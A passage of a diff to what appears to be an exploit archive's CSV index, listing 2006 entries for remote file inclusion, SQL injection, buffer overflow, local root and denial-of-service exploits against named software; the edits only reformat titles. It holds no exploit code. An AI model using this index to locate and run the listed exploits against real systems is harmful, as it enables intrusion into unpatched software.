(sco/x86)",2006-09-08,"RISE Security",sco,local,0 +2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc)",2006-09-08,"RISE Security",solaris,local,0 +2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 +2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (sco/x86)",2006-09-08,"RISE Security",sco,local,0 2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 2334,platforms/windows/dos/2334.py,"Multithreaded TFTP <= 1.1 (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb <= 1.0.3 (base) Remote File Include Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0 @@ -2044,7 +2044,7 @@ id,file,description,date,author,platform,type,port 2348,platforms/php/webapps/2348.pl,"phpBB <= 2.0.21 (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS <= 1.05 (abs_pfad) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 -2351,platforms/php/webapps/2351.txt,"Popper <= v1.41-r2 (form) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 +2351,platforms/php/webapps/2351.txt,"Popper <= 1.41-r2 - (form) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0 @@ -2053,7 +2053,7 @@ id,file,description,date,author,platform,type,port 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 (art) Remote File Include Vulnerability",2006-09-13,SilenZ,php,webapps,0 -2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD Local Buffer Overflow Exploit (solaris/sparc)",2006-09-13,"Marco Ivaldi",solaris,local,0 +2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc)",2006-09-13,"Marco Ivaldi",solaris,local,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 (root) Remote File Include Vulnerability",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 (icerikno) Remote SQL Injection Vulnerability",2006-09-13,RMx,asp,webapps,0 2363,platforms/php/webapps/2363.tt,"Magic News Pro <= 1.0.3 (script_path) Remote File Include Vulnerability",2006-09-13,"Saudi Hackrz",php,webapps,0 @@ -2064,7 +2064,7 @@ id,file,description,date,author,platform,type,port 2368,platforms/php/webapps/2368.txt,"TeamCal Pro <= 2.8.001 (app_root) Remote file Include Vulnerability",2006-09-14,PSYCH@,php,webapps,0 2369,platforms/php/webapps/2369.txt,"PhotoPost <= 4.6 (PP_PATH) Remote File Include Vulnerability",2006-09-15,"Saudi Hackrz",php,webapps,0 2370,platforms/php/webapps/2370.php,"Limbo CMS <= 1.0.4.2L (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 -2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 (tr) Remote SQL Injection Vulnerability",2006-09-15,"Fix TR",asp,webapps,0 +2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1- (tr) Remote SQL Injection Vulnerability",2006-09-15,"Fix TR",asp,webapps,0 2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 (gBRootPath) Remote File Include Vulnerability",2006-09-15,"Mehmet Ince",php,webapps,0 2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 Advisory / Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 @@ -2080,10 +2080,10 @@ id,file,description,date,author,platform,type,port 2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 (browse.asp) Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 -2387,platforms/asp/webapps/2387.txt,"Charon Cart v3 (Review.asp) Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 +2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) Remote SQL Injection Vulnerability",2006-09-17,ajann,asp,webapps,0 2388,platforms/php/webapps/2388.txt,"CMtextS <= 1.0 (users_logins/admin.txt) Credentials Disclosure Vuln",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends <= 4.85 Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 -2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g (phpbb_root_path) Remote File Include Vulnerability",2006-09-18,AzzCoder,php,webapps,0 +2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Include Vulnerability",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS <= 0.96.3 (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro (Home_Path) Remote File Include Vulnerability",2006-09-19,"Saudi Hackrz",php,webapps,0 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro (Inc_Dir) Remote File Include Vulnerabilities",2006-09-19,SnIpEr_SA,php,webapps,0 @@ -2099,7 +2099,7 @@ id,file,description,date,author,platform,type,port 2403,platforms/windows/remote/2403.c,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit",2006-09-20,nop,windows,remote,0 2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 (LHA long directory name) Local Overflow Exploit",2006-09-20,Guay-Leroux,linux,local,0 2405,platforms/php/webapps/2405.txt,"AllMyGuests <= 0.4.1 (cfg_serverpath) Remote File Include Vulnerability",2006-09-20,Br@Him,php,webapps,0 -2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 (sort) Remote SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 +2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) Remote SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 2407,platforms/php/webapps/2407.txt,"pNews <= 1.1.0 (nbs) Remote File Include Vulnerability",2006-09-21,CvIr.System,php,webapps,0 2408,platforms/windows/remote/2408.pl,"MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)",2006-09-21,"Trirat Puttaraksa",windows,remote,0 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0 @@ -2108,7 +2108,7 @@ id,file,description,date,author,platform,type,port 2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0 2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 -2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 +2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 2416,platforms/asp/webapps/2416.txt,"xweblog <= 2.1 (kategori.asp) Remote SQL Injection Vulnerability",2006-09-22,Muhacir,asp,webapps,0 2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 (index.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 (all_users.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 @@ -2128,7 +2128,7 @@ id,file,description,date,author,platform,type,port 2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 (admin/index.php) Remote File Include Vulnerability",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 (fs_form_links.php) File Include Vuln",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 (parser.php) Remote File Include Vulnerability",2006-09-26,ThE-WoLf-KsA,php,webapps,0 -2436,platforms/php/webapps/2436.txt,"A-Blog V2 (menu.php) Remote File Include Vulnerability",2006-09-26,Drago84,php,webapps,0 +2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Include Vulnerability",2006-09-26,Drago84,php,webapps,0 2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 (hit.php) Remote File Include Vulnerability",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 (editfunc.inc.php) File Include Vulnerability",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 @@ -2141,7 +2141,7 @@ id,file,description,date,author,platform,type,port 2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 2448,platforms/windows/remote/2448.html,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (html)",2006-09-28,jamikazu,windows,remote,0 -2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 +2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 (config.inc.php) File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 (index.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability",2006-09-28,Kernel-32,php,webapps,0 2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include Vulnerability",2006-09-28,D_7J,php,webapps,0 @@ -2151,7 +2151,7 @@ id,file,description,date,author,platform,type,port 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit",2006-09-29,Trex,php,webapps,0 2457,platforms/php/webapps/2457.php,"UBB.threads <= 6.5.1.1 (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 2458,platforms/windows/remote/2458.pl,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (pl)",2006-09-29,"YAG KOHHA",windows,remote,0 -2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 +2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2460,platforms/windows/remote/2460.c,"MS Internet Explorer WebViewFolderIcon setSlice() Exploit (c)",2006-09-29,LukeHack,windows,remote,0 2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 (yesno.phtml) Remote Include Vulnerability",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 @@ -2186,8 +2186,8 @@ id,file,description,date,author,platform,type,port 2491,platforms/php/webapps/2491.pl,"phpPC <= 1.03 RC1 (/lib/functions.inc.php) Remote File Include Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2492,platforms/linux/local/2492.s,"Infecting Elf Binaries to Gain Local Root Exploit",2006-10-08,Sha0,linux,local,0 2493,platforms/php/webapps/2493.pl,"docmint <= 2.0 (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 -2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc <=1.4 (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 -2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog <=1.4 (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 +2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2496,platforms/php/webapps/2496.txt,"WebYep <= 1.1.9 (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery <= 1.4 (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke <= 2.5.8 file() Priv Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 @@ -2195,7 +2195,7 @@ id,file,description,date,author,platform,type,port 2500,platforms/php/webapps/2500.pl,"phpMyAgenda <= 3.1 (templates/header.php3) Local File Include Exploit",2006-10-10,"Nima Salehi",php,webapps,0 2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta (ftag.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL (main.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 -2503,platforms/php/webapps/2503.txt,"compteur v2 (param_editor.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 +2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 2504,platforms/php/webapps/2504.txt,"eboli (index.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 2505,platforms/php/webapps/2505.txt,"JASmine <= 0.0.2 (index.php) Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 2506,platforms/php/webapps/2506.txt,"Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability",2006-10-10,DarkFig,php,webapps,0 @@ -2211,11 +2211,11 @@ id,file,description,date,author,platform,type,port 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 (import-archive.php) File Include Vulnerability",2006-10-11,"Nima Salehi",php,webapps,0 2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0 2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 -2519,platforms/php/webapps/2519.txt,"Minichat v6 (ftag.php) Remote File Include Vulnerability",2006-10-11,Zickox,php,webapps,0 +2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include Vulnerability",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 (spaw) Remote File Include Vulnerability",2006-10-12,v1per-haCker,php,webapps,0 -2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 -2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 +2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 +2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Include Vulnerability",2006-10-12,"Mehmet Ince",php,webapps,0 @@ -2263,11 +2263,11 @@ id,file,description,date,author,platform,type,port 2568,platforms/php/webapps/2568.txt,"webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit",2006-10-15,Kiba,php,webapps,0 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr LD_PRELOAD Arbitrary File Creation Local Root Exploit",2006-10-16,"Marco Ivaldi",solaris,local,0 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore <= 4.4 Remote File Include Vulnerabilities",2006-10-16,Matdhule,php,webapps,0 -2571,platforms/windows/dos/2571.pl,"Xfire <= 1.6.4 (Malicious Request) Remote Denial of Service Exploit (pl)",2006-10-16,n00b,windows,dos,0 +2571,platforms/windows/dos/2571.pl,"Xfire <= 1.6.4 - Remote Denial of Service Exploit (pl)",2006-10-16,n00b,windows,dos,0 2572,platforms/php/webapps/2572.txt,"Osprey <= 1.0 GetRecord.php Remote File Include Vulnerability",2006-10-16,Kw3[R]Ln,php,webapps,0 2573,platforms/php/webapps/2573.php,"Comdev One Admin 4.1 adminfoot.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 2574,platforms/php/webapps/2574.php,"Simplog <= 0.9.3.1 comments.php Remote SQL Injection Exploit",2006-10-16,w4ck1ng,php,webapps,0 -2575,platforms/php/webapps/2575.php,"Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 +2575,platforms/php/webapps/2575.php,"Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database (client.php) Remote File Include Vulnerability",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 Remote File Include Vulnerability",2006-10-16,vegas78,php,webapps,0 2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 @@ -2279,7 +2279,7 @@ id,file,description,date,author,platform,type,port 2584,platforms/php/webapps/2584.pl,"PHPRecipeBook <= 2.35 (g_rb_basedir) Remote File Include Exploit",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli <= 3.0.1 Multiple Remote File Inclusion Vulnerabilities",2006-10-17,the_day,php,webapps,0 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 -2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 +2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 2588,platforms/php/webapps/2588.txt,"Easynews <= 4.4.1 (admin.php) Authentication Bypass Vulnerability",2006-10-17,nuffsaid,php,webapps,0 2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 (txt.inc.php) Remote Code Execution Vulnerability",2006-10-18,nuffsaid,php,webapps,0 @@ -2323,7 +2323,7 @@ id,file,description,date,author,platform,type,port 2631,platforms/php/webapps/2631.php,"Ascended Guestbook <= 1.0.0 (embedded.php) File Include Exploit",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon <= 2.0 (mainpath) Remote File Include Exploit",2006-10-24,r0ut3r,php,webapps,0 2633,platforms/hp-ux/local/2633.c,"HP-UX 11i (swpackage) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 -2634,platforms/hp-ux/local/2634.c,"HP-UX 11i (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 +2634,platforms/hp-ux/local/2634.c,"HP-UX 11i (swmodify) Stack Overflow Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i (swask) Format String Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2636,platforms/hp-ux/local/2636.c,"HP-UX 11i (LIBC TZ enviroment variable) Local Root Exploit",2006-10-24,prdelka,hp-ux,local,0 2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 @@ -2399,7 +2399,7 @@ id,file,description,date,author,platform,type,port 2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0 2710,platforms/php/webapps/2710.txt,"Ariadne <= 2.4 store_config[code] Remote File Include Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0 -2711,platforms/php/webapps/2711.php,"e107 <= 0.75 (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 +2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 2712,platforms/php/webapps/2712.php,"MDPro <= 1.0.76 (Cookie: PNSVlang) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916Remote File Inclusion Vulnerability",2006-11-04,GregStar,php,webapps,0 2714,platforms/php/webapps/2714.pl,"PHPKIT <= 1.6.1R2 (search_user) Remote SQL Injection Exploit",2006-11-04,x23,php,webapps,0 @@ -2430,8 +2430,8 @@ id,file,description,date,author,platform,type,port 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0 -2743,platforms/windows/remote/2743.html,"MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit",2006-11-08,n/a,windows,remote,0 -2744,platforms/php/webapps/2744.txt,"LetterIt v2 (inc/session.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 +2743,platforms/windows/remote/2743.html,"MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit",2006-11-08,n/a,windows,remote,0 +2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0 2746,platforms/asp/webapps/2746.pl,"AspPired2Poll <= 1.0 (MoreInfo.asp) Remote SQL Injection Exploit",2006-11-09,ajann,asp,webapps,0 2747,platforms/php/webapps/2747.txt,"MyAlbum <= 3.02 (language.inc.php) Remote File Inclusion Vulnerability",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 @@ -2460,7 +2460,7 @@ id,file,description,date,author,platform,type,port 2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver Probe Response SSID Overflow Exploit (meta)",2006-11-13,"H D Moore",windows,remote,0 2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 Wireless Driver Beacon Rates Overflow Exploit (meta)",2006-11-13,"H D Moore",windows,remote,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration <= 2.0 (save_profile.asp) Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 -2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= v1.3 (default.asp) Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 +2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager <= 1.3 - (default.asp) Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 (vir_Login.asp) Remote Login Bypass Vulnerability",2006-11-13,ajann,asp,webapps,0 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 (installed_config_file) File Include Vulnerabilities",2006-11-13,Firewall,php,webapps,0 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 (upload/xss) Multiple Remote Vulnerabilities",2006-11-14,Timq,php,webapps,0 @@ -2538,7 +2538,7 @@ id,file,description,date,author,platform,type,port 2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0 2860,platforms/windows/dos/2860.c,"Quintessential Player <= 4.50.1.82 (Playlist) Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 2861,platforms/windows/dos/2861.c,"Songbird Media Player <= 0.2 Format String Denial of Service PoC",2006-11-28,"Greg Linares",windows,dos,0 -2862,platforms/php/webapps/2862.txt,"P-News v2 (user.txt) Remote Password Disclosure Vulnerability",2006-11-28,Lu7k,php,webapps,0 +2862,platforms/php/webapps/2862.txt,"P-News 2.0 - (user.txt) Remote Password Disclosure Vulnerability",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit",2006-11-29,BlackHawk,php,webapps,0 2864,platforms/php/webapps/2864.txt,"b2evolution 1.8.5 - 1.9b (import-mt.php) Remote File Include Vulnerability",2006-11-29,tarkus,php,webapps,0 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit",2006-11-30,cthulhu,windows,remote,69 @@ -2548,11 +2548,11 @@ id,file,description,date,author,platform,type,port 2870,platforms/windows/remote/2870.rb,"VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (meta)",2006-11-30,"Greg Linares",windows,remote,0 2871,platforms/php/webapps/2871.txt,"LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability",2006-11-30,ajann,php,webapps,0 2872,platforms/windows/local/2872.c,"VUPlayer <= 2.44 (M3U UNC Name) Buffer Overflow Exploit (c)",2006-11-30,Expanders,windows,local,0 -2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 Malformed M3U Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0 +2873,platforms/windows/local/2873.c,"AtomixMP3 <= 2.3 - (.M3U) Buffer Overflow Exploit",2006-11-30,"Greg Linares",windows,local,0 2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / tnftpd Remote Stack Overflow PoC",2006-11-30,Kingcope,bsd,dos,0 2876,platforms/php/webapps/2876.txt,"deV!Lz Clanportal [DZCP] <= 1.3.6 Arbitrary File Upload Vulnerability",2006-12-01,"Tim Weber",php,webapps,0 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 SQL Injection Vulnerability",2006-12-01,n/a,php,webapps,0 -2878,platforms/php/webapps/2878.txt,"ContentServ 4.x (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0 +2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure Vulnerability",2006-12-01,qobaiashi,php,webapps,0 2879,platforms/windows/dos/2879.py,"MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day)",2006-12-01,h07,windows,dos,0 